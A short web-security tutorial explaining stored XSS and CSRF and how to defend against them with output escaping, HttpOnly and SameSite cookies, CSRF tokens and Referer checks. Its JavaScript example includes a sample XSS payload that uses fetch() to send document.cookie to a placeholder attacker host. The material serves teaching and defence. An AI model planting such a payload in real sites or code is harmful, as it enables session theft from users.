XSS and CSRF
XSS
Principle
In an XSS (cross-site scripting) attack the attacker submits script through an input box on the page (a comment field, for example), and the site stores it and later renders it without escaping. The script can do anything from showing an alert or running an endless loop to reading the user's login information (the session cookie or login token).
When another user visits that page, the stored script is loaded and runs in their browser: it shows the pop-up, spins in its loop, or sends a request to the attacker's server carrying the victim's login information, which the attacker can then use directly to log in as that user.
Solution
1. Do not trust any input. The back end must escape the output before it is rendered, especially the special characters <, >, ", ' and &, so that user data is shown as text rather than interpreted as markup. If the login information is kept in a cookie, set the HttpOnly flag (injected script can no longer read it through document.cookie) and SameSite (the browser stops attaching it to cross-site requests).
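The following is an added example, not code from the original page: a stored-XSS sink next to its escaped form, plus the cookie flags described above. The comment template, the cookie name `sid` and the attacker host `attacker.example.invalid` are assumptions, and the payload is a constructed sample of what an attacker would submit.

```javascript
// Added example (not from the original page). Escape-on-output for an HTML text
// context, and the Set-Cookie flags that limit what injected script can steal.
const escapeMap = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can break out of HTML text or attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => escapeMap[c]);
}

// Vulnerable: the untrusted comment is concatenated straight into the markup,
// so a <script> tag inside it is parsed as HTML and executed by every visitor.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened: same template, but the untrusted value is escaped on output,
// so the browser displays the payload as text instead of running it.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Session cookie flags (cookie name 'sid' is an assumption):
//   HttpOnly      - document.cookie cannot read it, so injected script cannot exfiltrate it
//   SameSite=Lax  - the browser does not attach it to most cross-site requests
//   Secure        - only sent over HTTPS
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed payload: exfiltrates document.cookie to a host the attacker controls
// (example.invalid is a reserved name that never resolves).
const payload = '<script>fetch("https://attacker.example.invalid/?c=" + document.cookie)</script>';

console.log(renderCommentUnsafe(payload)); // script tag survives, runs in the victim's browser
console.log(renderCommentSafe(payload));   // &lt;script&gt;... : rendered as harmless text
console.log(sessionCookie('sid', 'abc123'));
```

With HttpOnly set, the payload still runs if the escaping is missing (it can still make requests as the victim from inside the page), but `document.cookie` no longer contains the session value, so the "send the cookie to my server" step fails. Escaping is the fix; the cookie flags limit the damage when escaping is missed somewhere.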
CSRF
Principle
In a CSRF (cross-site request forgery) attack the user's login information for the attacked site (a.com) has not expired since they last left it. While that session cookie is still valid the user visits b.com (a phishing site), and a page on b.com issues a request to an interface on a.com. The browser attaches a.com's cookie to that request automatically, so a.com executes it with the user's identity even though the user never intended it.
Solution
1. Do not rely on the cookie for interface authentication: send an Auth header instead (a JWT in the Authorization header), which the browser does not attach on its own, or make the interface refuse requests that authenticate by cookie only.
2. Csrf_token: a random value bound to the session, delivered in the page and sent back with every state-changing request. b.com cannot read a.com's page, so its forged request cannot include the token and fails the check.
3. Validate the Referer (but this header can be missing or modified, so treat it only as a supplementary check).